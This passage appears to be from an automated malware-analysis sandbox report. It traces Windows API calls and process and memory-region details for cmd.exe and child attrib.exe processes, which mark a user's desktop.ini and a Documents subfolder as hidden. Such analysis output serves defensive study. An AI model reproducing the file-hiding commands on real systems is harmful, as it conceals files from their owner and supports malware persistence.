lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.341] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.341] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0236.342] _close (_FileHandle=3) returned 0 [0236.342] GetConsoleTitleW (in: lpConsoleTitle=0x2cf180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.342] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.342] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.343] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.343] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.343] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.343] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.343] GetConsoleTitleW (in: lpConsoleTitle=0x2cef14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.343] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ced9c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cee64 | out: lpAttributeList=0x2ced9c, lpSize=0x2cee64) returned 1 [0236.343] UpdateProcThreadAttribute (in: lpAttributeList=0x2ced9c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cee5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ced9c, lpPreviousValue=0x0) returned 1 [0236.343] GetStartupInfoW (in: lpStartupInfo=0x2ced58 | out: lpStartupInfo=0x2ced58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.343] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cedf8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cee44 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessInformation=0x2cee44*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb28, dwThreadId=0xbe0)) returned 1 [0236.345] CloseHandle (hObject=0x50) returned 1 [0236.345] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.346] GetEnvironmentStringsW () returned 0x4a2d20* [0236.346] FreeEnvironmentStringsW (penv=0x4a2d20) returned 1 [0236.346] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0236.530] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ced38 | out: lpExitCode=0x2ced38*=0x0) returned 1 [0236.530] CloseHandle (hObject=0x4c) returned 1 [0236.530] _vsnwprintf (in: _Buffer=0x2cee80, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced44 | out: _Buffer="00000000") returned 8 [0236.530] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.530] GetEnvironmentStringsW () returned 0x4a2d20* [0236.530] FreeEnvironmentStringsW (penv=0x4a2d20) returned 1 [0236.530] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.530] GetEnvironmentStringsW () returned 0x4a2d20* [0236.530] FreeEnvironmentStringsW (penv=0x4a2d20) returned 1 [0236.530] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ced9c | out: lpAttributeList=0x2ced9c) [0236.530] GetConsoleTitleW (in: lpConsoleTitle=0x2cf180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.530] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.530] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.531] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.531] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.531] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.531] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.531] GetConsoleTitleW (in: lpConsoleTitle=0x2cef14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.531] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ced9c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cee64 | out: lpAttributeList=0x2ced9c, lpSize=0x2cee64) returned 1 [0236.531] UpdateProcThreadAttribute (in: lpAttributeList=0x2ced9c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cee5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ced9c, lpPreviousValue=0x0) returned 1 [0236.531] GetStartupInfoW (in: lpStartupInfo=0x2ced58 | out: lpStartupInfo=0x2ced58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.531] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.531] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cedf8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cee44 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessInformation=0x2cee44*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb38, dwThreadId=0xbf0)) returned 1 [0236.533] CloseHandle (hObject=0x4c) returned 1 [0236.533] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.533] GetEnvironmentStringsW () returned 0x4a3760* [0236.533] FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.533] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0236.568] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ced38 | out: lpExitCode=0x2ced38*=0x0) returned 1 [0236.568] CloseHandle (hObject=0x50) returned 1 [0236.568] _vsnwprintf (in: _Buffer=0x2cee80, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced44 | out: _Buffer="00000000") returned 8 [0236.568] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.568] GetEnvironmentStringsW () returned 0x4a3760* [0236.568] FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.569] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.569] GetEnvironmentStringsW () returned 0x4a3760* [0236.569] FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.569] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ced9c | out: lpAttributeList=0x2ced9c) [0236.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.569] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.569] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.569] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.569] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.569] SetConsoleInputExeNameW () returned 0x1 [0236.569] GetConsoleOutputCP () returned 0x1b5 [0236.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.569] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.569] exit (_Code=0) Process: id = "647" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35692 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35693 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35694 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35695 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35696 start_va = 0x140000 end_va = 0x146fff entry_point = 0x140000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35697 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35698 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35699 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35700 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 35701 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35702 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35703 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35704 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35705 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 35706 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 35707 start_va = 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35708 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35709 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35710 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35711 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35712 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35713 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35714 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35715 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35716 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35717 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35718 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35719 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 35720 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35721 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 888 os_tid = 0xa3c Process: id = "648" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35725 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35726 start_va = 0xfc0000 end_va = 0xfc6fff entry_point = 0xfc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35730 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35732 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35733 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35734 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35735 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35736 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 35737 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35738 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35739 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35740 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35741 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35742 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35746 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35747 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35748 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35749 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 35750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 889 os_tid = 0xbe0 Process: id = "649" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35753 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35754 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35755 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35756 start_va = 0x620000 end_va = 0x626fff entry_point = 0x620000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35757 start_va = 